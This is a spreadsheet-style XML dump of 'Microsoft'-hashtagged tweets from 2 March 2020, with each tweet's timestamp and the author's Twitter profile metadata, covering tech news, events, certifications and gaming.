    <t>{'id': 23411501, 'id_str': '23411501', 'name': 'Alexandre Saiz Verdaguer', 'screen_name': 'alexandresaiz', 'location': 'Marbella, Spain', 'description': 'Head of products at microapps, creators of MoonMail and MONEI.\nWriter: https://t.co/vshdTJj2XV âœï¸ Instagram: https://t.co/D77MpvGhg8 ðŸ“¸', 'url': 'https://t.co/IfbK94RKlB', 'entities': {'url': {'urls': [{'url': 'https://t.co/IfbK94RKlB', 'expanded_url': 'http://monei.net', 'display_url': 'monei.net', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/vshdTJj2XV', 'expanded_url': 'https://goo.gl/u3HNza', 'display_url': 'goo.gl/u3HNza', 'indices': [71, 94]}, {'url': 'https://t.co/D77MpvGhg8', 'expanded_url': 'https://goo.gl/9ahbcD', 'display_url': 'goo.gl/9ahbcD', 'indices': [109, 132]}]}}, 'protected': False, 'followers_count': 4460, 'friends_count': 3720, 'listed_count': 51, 'created_at': 'Mon Mar 09 07:03:16 +0000 2009', 'favourites_count': 572, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6473, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '07090B', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme11/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme11/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/621911654/a_mini_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/621911654/a_mini_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/23411501/1530101332', 'profile_link_color': 'FF691F', 'profile_sidebar_border_color': 'BFBFBF', 'profile_sidebar_fill_color': 'C9C9C9', 'profile_text_color': '1C1F23', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 20:15:07 +0000 2020</t>
  </si>
  <si>
    <t>What makes a successful digital transformation, according to @Microsoft: https://t.co/7MMqQx3W6k #digitaltransformation #digitalsuccess #technews #digitalnews #microsoft https://t.co/keA59X2GOp</t>
  </si>
  <si>
    <t>{'id': 4831771097, 'id_str': '4831771097', 'name': 'Araza', 'screen_name': 'ArazaAU', 'location': 'Melbourne, Victoria', 'description': 'We help make your transformative technology projects a success | Proudly gender equal @ArazaWomen | Our values: #begreatbegrateful', 'url': 'https://t.co/AFwcRLKrqb', 'entities': {'url': {'urls': [{'url': 'https://t.co/AFwcRLKrqb', 'expanded_url': 'http://araza.com.au', 'display_url': 'araza.com.au', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 51, 'friends_count': 116, 'listed_count': 1, 'created_at': 'Thu Jan 21 04:50:24 +0000 2016', 'favourites_count': 670, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 314, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/690037510056054784/0ZFZ72FI_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/690037510056054784/0ZFZ72FI_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4831771097/1559107047',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</si>
  <si>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20:14:23 +0000 2020</t>
  </si>
  <si>
    <t>#spsbre -#sps_warsaw here I come . Flight and Hotel are booked . Look forward to another great day with another great community. Hope to see you there! #O365 #Microsoft #useradoption #communityrocks #sharingiscaring</t>
  </si>
  <si>
    <t>Mon Mar 02 20:14:08 +0000 2020</t>
  </si>
  <si>
    <t>Top FREE #Microsoft Certification Hands-on Labs
 #github #lab #MicrosoftLearn #OpenSource #Azure
https://t.co/bHSDSMk3Uc</t>
  </si>
  <si>
    <t>Mon Mar 02 20:13:26 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Tech Community Update Mar 3rd, 2020 #Microsoft  https://t.co/2SkrFZvfWy</t>
  </si>
  <si>
    <t>Working remotely during challenging times #Microsoft  https://t.co/tD5h9aUc4K</t>
  </si>
  <si>
    <t>Mon Mar 02 20:13:10 +0000 2020</t>
  </si>
  <si>
    <t>Windows 10 is about to lose its smart home support  https://t.co/3VtkMwqxWQ #technews #technology #microsoft #techradar</t>
  </si>
  <si>
    <t>Mon Mar 02 20:10:14 +0000 2020</t>
  </si>
  <si>
    <t>Acquiring knowledge is what we must go for from time to time.
#microsoft 
#educonsult 
#21stcenturylearning 
#microsoftinnovativeeducator 
#microsoftinnovationsummit https://t.co/UOyxjTInj6</t>
  </si>
  <si>
    <t>{'id': 358308169, 'id_str': '358308169', 'name': 'Zabeth Sanmi-Agboola', 'screen_name': 'Lizziewonder', 'location': 'Lagos, Nigeria', 'description': 'Administrative  Officer| Relationship Manager', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 36, 'friends_count': 105, 'listed_count': 0, 'created_at': 'Fri Aug 19 18:24:31 +0000 2011', 'favourites_count': 38, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 150,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'http://pbs.twimg.com/profile_images/1117063725914251264/d4VUGdrk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1117063725914251264/d4VUGdrk_normal.jpg',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</si>
  <si>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20:10:11 +0000 2020</t>
  </si>
  <si>
    <t>Learned more today about attracting women to tech at the @NCWIT Regional launch at #Microsoft in Detroit w/ @camillewalker.  When @NPowerOrg Exec Directors unite! #NPowerMaryland #BaltimoreinDetroit #womenintech #40by22 https://t.co/Ey3lXpYCTf</t>
  </si>
  <si>
    <t>{'id': 915952095559380993, 'id_str': '915952095559380993', 'name': 'Kendra', 'screen_name': 'KendraParlock', 'location': 'Baltimore, MD', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 42, 'friends_count': 61, 'listed_count': 0, 'created_at': 'Thu Oct 05 14:49:31 +0000 2017', 'favourites_count': 54, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True,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'http://pbs.twimg.com/profile_images/1230228143706976257/yxq1B8_z_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1230228143706976257/yxq1B8_z_normal.jpg',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</si>
  <si>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20:06:56 +0000 2020</t>
  </si>
  <si>
    <t>How can you sit in the garage and not expect a drive by??? #RainbowSixSiege #RainbowSix #siege #rainbow6siege #Xbox #XboxOne #Microsoft #TomClancysRainbowSixSiege #headshot https://t.co/ZasdZRuJPy</t>
  </si>
  <si>
    <t>Mon Mar 02 20:06:42 +0000 2020</t>
  </si>
  <si>
    <t>Never gets old #pan #xboxone #microsoft #gaming #gamer #battlegrounds #pubg #captdiabe3tus #winnerwinnerchickendinner #blessed https://t.co/eLEdiH1UAC</t>
  </si>
  <si>
    <t>{'id': 2283653593, 'id_str': '2283653593', 'name': 'CaptDiabe3tus', 'screen_name': 'VoiceintheWest', 'location': 'Dallas, TX', 'description': 'find me on xbox: CaptDiabe3tus\ntype 1 diabetic \nWDE', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 219, 'friends_count': 706, 'listed_count': 4, 'created_at': 'Thu Jan 09 14:21:23 +0000 2014', 'favourites_count': 11068, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2508,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'http://pbs.twimg.com/profile_images/1178971440001032192/VWF69FiN_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1178971440001032192/VWF69FiN_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2283653593/1560012625', 'profile_link_color': '2FC2EF',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</si>
  <si>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Mon Mar 02 20:05:22 +0000 2020</t>
  </si>
  <si>
    <t>Well it's a win tootallmitch #winnerwinnerchickendinner #xboxone #microsoft #gaming #gamer #battlegrounds #pubg #captdiabe3tus #winnerwinnerchickendinner #blessed https://t.co/U3501yPSTR</t>
  </si>
  <si>
    <t>Mon Mar 02 20:05:13 +0000 2020</t>
  </si>
  <si>
    <t>An update to #Microsoft certifications: MCSA, MCSD, and MCSE retiring end of June 2020 https://t.co/Viw5zqmjOy &amp;gt; Very important update from @JussiRoine . The nice overview of new roles may be see on page 3 at https://t.co/LDPEVr73OZ</t>
  </si>
  <si>
    <t>{'id': 595813748, 'id_str': '595813748', 'name': 'Eric Overfield', 'screen_name': 'EricOverfield', 'location': '', 'description': 'President and Co-founder @pixelmillteam ~ #TechEnthusiast ~ #msft rd &amp; mvp ~ author ~ #ActivityDriven', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2531, 'friends_count': 292, 'listed_count': 222, 'created_at': 'Thu May 31 20:48:19 +0000 2012', 'favourites_count': 1432, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7195,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'http://pbs.twimg.com/profile_images/855147954533015552/xifxYWKg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/855147954533015552/xifxYWKg_normal.jpg',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</si>
  <si>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20:05:08 +0000 2020</t>
  </si>
  <si>
    <t>We are excited to have @robbeekmans @HilkoLantinga @jackmadden @rspruijt present at our VDI Performance Summit - Virtual Event on April 2. Check it out: https://t.co/EkcLaWWHDX #Citrix #VMware @TechTarget #Microsoft #vdisummit https://t.co/gIlO2pJuZT</t>
  </si>
  <si>
    <t>{'id': 339564964, 'id_str': '339564964', 'name': 'Login VSI', 'screen_name': 'LoginVSI', 'location': 'Amsterdam, The Netherlands; ', 'description': 'Login VSI automatically tests &amp; validates the impact of change to the digital workspace to maximize the true end-user experience. #VDI #EUC #DigitalWorkspace', 'url': 'https://t.co/31T4j8VZS8', 'entities': {'url': {'urls': [{'url': 'https://t.co/31T4j8VZS8', 'expanded_url': 'https://www.loginvsi.com', 'display_url': 'loginvsi.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6192, 'friends_count': 4949, 'listed_count': 117, 'created_at': 'Thu Jul 21 09:17:53 +0000 2011', 'favourites_count': 2839, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5253,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'http://pbs.twimg.com/profile_images/1222193661141770241/Kdi-kGOl_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1222193661141770241/Kdi-kGOl_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/339564964/1580228494', 'profile_link_color': '336699', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'DDEEF6', 'profile_text_color': '0077AA', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 20:04:29 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Reveals The Power Of Tech Intensity https://t.co/Alnn3f2hrw
#Microsoft #TechIntensity #AI #IoT</t>
  </si>
  <si>
    <t>Mon Mar 02 20:03:34 +0000 2020</t>
  </si>
  <si>
    <t>It is a privilege to announce our next speaker @t1m0th1 back to teach us all about the Microsoft Cloud Adoption Framework! Secure your place on our meet-up page now and enjoy the fantastic knowledge Tim Myers will be sharing with us #Microsoft  @Azure https://t.co/zSziN6vQMB</t>
  </si>
  <si>
    <t>{'id': 1065226783698681856, 'id_str': '1065226783698681856', 'name': '.Net Liverpool', 'screen_name': 'dotnetliverpool', 'location': 'Liverpool, England', 'description': 'A .NET / C# user group to bring together the .NET community in Liverpool.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 157, 'friends_count': 15, 'listed_count': 4, 'created_at': 'Wed Nov 21 12:53:50 +0000 2018', 'favourites_count': 86, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 105, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1143532480047308801/K13968sr_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1143532480047308801/K13968sr_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1065226783698681856/1561474365',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</si>
  <si>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20:02:26 +0000 2020</t>
  </si>
  <si>
    <t>Exicting to see #microsoft expanding in india https://t.co/M9IysRtkux</t>
  </si>
  <si>
    <t>Mon Mar 02 20:01:36 +0000 2020</t>
  </si>
  <si>
    <t>Join ASUG - Americas' SAP Users' Group in The Woodlands (greater Houston area) to learn more about SAP S/4HANA Hyperscaler Cloud. #SAP #Microsoft #Azure #BetterTogether #ASUG #HANA https://t.co/szXW42mLoN</t>
  </si>
  <si>
    <t>{'id': 163500790, 'id_str': '163500790', 'name': 'Ayman Husain', 'screen_name': 'aymanhusain', 'location': 'Houston, TX', 'description': 'Ayman Husain is a technologist and a technical architect specializing in Digital Transformation, Intelligent Cloud and Artificial Intelligence', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 455, 'friends_count': 739, 'listed_count': 55, 'created_at': 'Tue Jul 06 15:42:05 +0000 2010', 'favourites_count': 376, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2276,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'http://pbs.twimg.com/profile_images/466254133054287873/_B5P6uPv_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/466254133054287873/_B5P6uPv_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/163500790/1396586730',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</si>
  <si>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20:01:16 +0000 2020</t>
  </si>
  <si>
    <t>#cybersecurity #infosec #microsoft     With over 250k new malware samples being created and spread every day, Archon Security helps keep your organization secure 24/7. #Microsoft365 https://t.co/HdR9OcxXqk</t>
  </si>
  <si>
    <t>#cloud  #microsoft     Free yourself from managing the IT infrastructure of your nonprofit. Watch "Microsoft Azure for your cloud platform - what it is &amp;amp; how it works," from @MSFTNonprofits, to learn how to focus on delivering higher-impact apps. https://t.co/VBNS6Pdztv</t>
  </si>
  <si>
    <t>Mon Mar 02 20:00:09 +0000 2020</t>
  </si>
  <si>
    <t>How To: Setup Locations in Microsoft Dynamics 365 Business Central
https://t.co/SOcZyJlnC6
#microsoft #locations #howto #training</t>
  </si>
  <si>
    <t>Mon Mar 02 20:00:07 +0000 2020</t>
  </si>
  <si>
    <t>Review these #cloud mobile testing tools from #AWS, #Microsoft and #Google before you get started. https://t.co/MRMNO4vEoZ</t>
  </si>
  <si>
    <t>Mon Mar 02 20:00:05 +0000 2020</t>
  </si>
  <si>
    <t>Who would want to see this crossover happen? I know I would. 
(Figures are samus figma and Mattel master chief)
.
.
.
@Halo 
#halospotlight #343industries #xbox #microsoft #nintendo #metroidprime 
#Samus #crossover
#toyphotography 
#mondaythoughts https://t.co/htjlMGBpQ6</t>
  </si>
  <si>
    <t>Mon Mar 02 19:59:45 +0000 2020</t>
  </si>
  <si>
    <t>Protecting users from potentially unwanted applications in #Microsoft #Edge https://t.co/bGrdmwEOE6</t>
  </si>
  <si>
    <t>Mon Mar 02 19:58:53 +0000 2020</t>
  </si>
  <si>
    <t>Announcing Universal Print: a cloud-based print solution
#Microsoft #Azure #M365
#CloudPrinting #AzureFamily #Cloud  https://t.co/J43B3Kflsm</t>
  </si>
  <si>
    <t>Mon Mar 02 19:54:54 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is making waves in with their Windows 10X app structure. If Windows updates are slowing you down, youll want to hear this! https://t.co/eZVsk4LC5y</t>
  </si>
  <si>
    <t>{'id': 89630884, 'id_str': '89630884', 'name': 'SmartDeploy', 'screen_name': 'SmartDeploy', 'location': 'Seattle, WA', 'description': 'Leading provider of endpoint management software with a unique layered approach that allows for fast and easy #Windows imaging and application deployment.', 'url': 'http://t.co/fTgOMMrp5F', 'entities': {'url': {'urls': [{'url': 'http://t.co/fTgOMMrp5F', 'expanded_url': 'http://www.smartdeploy.com', 'display_url': 'smartdeploy.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 497, 'friends_count': 571, 'listed_count': 20, 'created_at': 'Fri Nov 13 05:05:14 +0000 2009', 'favourites_count': 248, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2932, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '7EC4C1', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme5/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme5/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/474593145024282624/9Nq9__vm_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/474593145024282624/9Nq9__vm_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/89630884/1572375410', 'profile_link_color': '7EC4C1', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'FFFFFF', 'profile_text_color': '595555', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 19:54:21 +0000 2020</t>
  </si>
  <si>
    <t>Final Fantasy VII Remake demo is out now for PS4!! 
#videogames #gamer #gamerguy #twitch #mixer #streamer #stream #gamerlife #fun #gaming #console #PC #mobile #geek #windows10 #Microsoft #Sony #google #psn #ps4... https://t.co/5h7MzNnIDb</t>
  </si>
  <si>
    <t>Mon Mar 02 19:53:02 +0000 2020</t>
  </si>
  <si>
    <t>Healthcare and Life Sciences Blog - Microsoft Tech Community #microsoft  https://t.co/Kw9tUHg1Oh</t>
  </si>
  <si>
    <t>Mon Mar 02 19:52:42 +0000 2020</t>
  </si>
  <si>
    <t>Great day full of interesting information
#RetailRealm,#UserGroupSummit,#PowerPlatformSummit,#MyDubai,#Microsoft,#Dynamics365,#MSDyn365,#D365Dubai,#DWTC https://t.co/rIvhaJPsL1</t>
  </si>
  <si>
    <t>{'id': 155581273, 'id_str': '155581273', 'name': 'Retail Realm', 'screen_name': 'rrdistiusa', 'location': 'Napa, California', 'description': 'Multinational retail tech company developing and distributing #Microsoft Dynamics #retail solutions, #MSDyn365, #MSDynAX + #MAXsuite, #MAXPAYGLOBAL', 'url': 'https://t.co/vBIcHhgRGv', 'entities': {'url': {'urls': [{'url': 'https://t.co/vBIcHhgRGv', 'expanded_url': 'http://www.retailrealm.com', 'display_url': 'retailrealm.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4778, 'friends_count': 5023, 'listed_count': 99, 'created_at': 'Mon Jun 14 14:44:35 +0000 2010', 'favourites_count': 1218, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1298, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '3B94D9', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/686414602704310272/Wa_lh8lx_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/686414602704310272/Wa_lh8lx_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/155581273/1533915865', 'profile_link_color': '3B94D9', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'C0DFEC', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 19:52:40 +0000 2020</t>
  </si>
  <si>
    <t>In a survey of big tech companies, #Microsoft is the most trusted company with people's data.
https://t.co/4R6IOREbGw https://t.co/Rr2qAHl280</t>
  </si>
  <si>
    <t>{'id': 145809488, 'id_str': '145809488', 'name': 'Ryan Pennett', 'screen_name': 'ryanpennett', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 45, 'friends_count': 186, 'listed_count': 1, 'created_at': 'Wed May 19 23:09:14 +0000 2010', 'favourites_count': 266, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 137,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'http://pbs.twimg.com/profile_images/577471417366765568/GJ1ld2pn_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/577471417366765568/GJ1ld2pn_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/145809488/1564688731',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</si>
  <si>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19:52:33 +0000 2020</t>
  </si>
  <si>
    <t>Manage all your businesses in just one database https://t.co/N7oMQGGzPg
#BusinessNews #tech #automation #TheresAnAppForThat #SmallBusinessOwner #Inventory #Database #Management #PowerBI #CRM #Microsoft #PowerPlatform #Service #CloudAccounting #CFOs https://t.co/nUVgCohP4U</t>
  </si>
  <si>
    <t>Mon Mar 02 19:51:01 +0000 2020</t>
  </si>
  <si>
    <t>Using CTEs to Improve SQL Queries #performance
https://t.co/MyeiTV81wN
#sqldba #tsql #SQLServer #Microsoft #madeiradata https://t.co/EpjKfvTcvs</t>
  </si>
  <si>
    <t>Mon Mar 02 19:44:29 +0000 2020</t>
  </si>
  <si>
    <t>Off to Sydney to speak at #PAFOWSyd today on how #Microsoft used #insights to support our #culturaltransformation - excitement mixed with a whole bunch of butterflies!! https://t.co/C7rcR0b1oU</t>
  </si>
  <si>
    <t>{'id': 588885798, 'id_str': '588885798', 'name': 'ð•‚ð•’ð•£ð•ð•–ð•– ð•Šð•”ð• ð•¥ð•¥-ð•„ð•¦ð•£ð•¡ð•™ð•ª ðŸ¥‹', 'screen_name': 'karleesm', 'location': 'Melbourne, Australia', 'description': 'â˜ï¸ Global Black Belt - Workplace Analytics @Microsoft #factnotfeel â˜ï¸ Opinions all mine! â˜ï¸ Crafty baker with a blackbelt (taekwondo) on the side she/her ðŸŽ¨ðŸ¥‹ðŸ°', 'url': 'https://t.co/TXrTIqO2wm', 'entities': {'url': {'urls': [{'url': 'https://t.co/TXrTIqO2wm', 'expanded_url': 'https://au.linkedin.com/in/karleescottmurphy', 'display_url': 'au.linkedin.com/in/karleescottâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 882, 'friends_count': 907, 'listed_count': 76, 'created_at': 'Thu May 24 03:45:04 +0000 2012', 'favourites_count': 1027, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2480,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'http://pbs.twimg.com/profile_images/714635934487158788/ezm-DDaR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/714635934487158788/ezm-DDaR_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/588885798/1519386925',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</si>
  <si>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19:43:26 +0000 2020</t>
  </si>
  <si>
    <t>Are you making money doing what you do on LinkedIn?
If you're not here to make money that is OK. 
This may not be Facebook, but it is a #SocialMedia platforn &amp;amp; I'm sure #Microsoft rather have you spending your #socialnetworking time here. 
However, if...https://t.co/mq5WvglM4k</t>
  </si>
  <si>
    <t>{'id': 760477934188716033, 'id_str': '760477934188716033', 'name': "Mike O'C #SPN #IFB", 'screen_name': 'SPNlocal', 'location': 'Chicago, IL', 'description': '#SPN generates hundreds of thousands of impressions for members &amp; sponsors weekly. Growing daily #JoinSPN #FollowMe #IFB #FollowBack Join the site &amp; #GROWwithus', 'url': 'https://t.co/NHv1px4MOb', 'entities': {'url': {'urls': [{'url': 'https://t.co/NHv1px4MOb', 'expanded_url': 'https://www.ServiceProfessionalsNetwork.com', 'display_url': 'ServiceProfessionalsNetwork.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6164, 'friends_count': 6107, 'listed_count': 186, 'created_at': 'Tue Aug 02 14:10:43 +0000 2016', 'favourites_count': 11790, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 13074, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1116574153958510592/yGKeCYRJ_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1116574153958510592/yGKeCYRJ_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/760477934188716033/1545412048',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</si>
  <si>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19:42:49 +0000 2020</t>
  </si>
  <si>
    <t>#Huawei packing lists provide new details about providing #Iran computer servers, switches and other devices made by #HP as well as softwares made by #American COs e.g. #Microsoft, #Symantec and #Novell @Jkylebass @JohnHemmings2 @GregWAutry @IanHFletch 
https://t.co/0c5mlVKPGr</t>
  </si>
  <si>
    <t>{'id': 1136968608112959488, 'id_str': '1136968608112959488', 'name': 'ðŸ˜·Guo LibraryðŸ˜·', 'screen_name': 'GuoLibrary', 'location': 'United States', 'description': '#Chineseâ‰ #CCP\nCombat #Coronavirus #UnrestrictedWarfare\nFree #HongKong, #Taiwan, #Tibet, #Xinjing, #Chinese people\n#EliminateCCP #æ»…å…± #GlobalSiegeOfCCP #å…¨çƒåœå‰¿ä¸­å…±', 'url': 'https://t.co/snX14ftLdd', 'entities': {'url': {'urls': [{'url': 'https://t.co/snX14ftLdd', 'expanded_url': 'https://rolsociety.org/', 'display_url': 'rolsociety.org', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4722, 'friends_count': 1923, 'listed_count': 25, 'created_at': 'Fri Jun 07 12:10:14 +0000 2019', 'favourites_count': 3799, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 10394, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1137073224003588096/L-7BUu7X_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1137073224003588096/L-7BUu7X_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1136968608112959488/1560213722',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</si>
  <si>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19:42:40 +0000 2020</t>
  </si>
  <si>
    <t>Enabling positive #enduserexperiences begins with trust. 
#Microsoft is working together with our customers to cultivate that trust during uncertain times like these. 
#lifeworkbalance 
#modernworkplace https://t.co/E7kMLoXXXA</t>
  </si>
  <si>
    <t>{'id': 1067113560, 'id_str': '1067113560', 'name': 'Stefani Quarles', 'screen_name': 'StefaniQuarles', 'location': 'Outside Your Box', 'description': 'living 4 Jesus | wife | mom | director at @microsoft | #customersuccess | i help people succeed in the #cloud | dj @thickumsjam | #mentalhealth | views=my own', 'url': 'https://t.co/yVy7prCZ4W', 'entities': {'url': {'urls': [{'url': 'https://t.co/yVy7prCZ4W', 'expanded_url': 'http://thickumsjam.com', 'display_url': 'thickumsjam.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1853, 'friends_count': 3590, 'listed_count': 144, 'created_at': 'Mon Jan 07 01:07:15 +0000 2013', 'favourites_count': 7505, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5493,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'http://pbs.twimg.com/profile_images/1219067808224567296/QoVDg5km_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1219067808224567296/QoVDg5km_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1067113560/1564069923',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</si>
  <si>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19:42:21 +0000 2020</t>
  </si>
  <si>
    <t>There's a feature in #Microsoft Teams that can revolutionize how you work. https://t.co/kSfnLV23p9 #productivity</t>
  </si>
  <si>
    <t>Mon Mar 02 19:38:59 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/77k5LabwZd
CORSO ECDL BASE - WORD
#aica #applicazioni #apps #computer #doc #document #ecdl #elaborazione #input #microsoft #microsoft_office_suite #modulo_3 #office #output #save #software #suite #texteditor #word #wordprocessing #icdl
https://t.co/miXfvkAQFc https://t.co/jIgYVIh3zF</t>
  </si>
  <si>
    <t>Mon Mar 02 19:38:56 +0000 2020</t>
  </si>
  <si>
    <t>Check out Microsoft HM3-00011 Xbox Elite Wireless Controller White #Microsoft https://t.co/OFD3Q1lZ3c via @eBay</t>
  </si>
  <si>
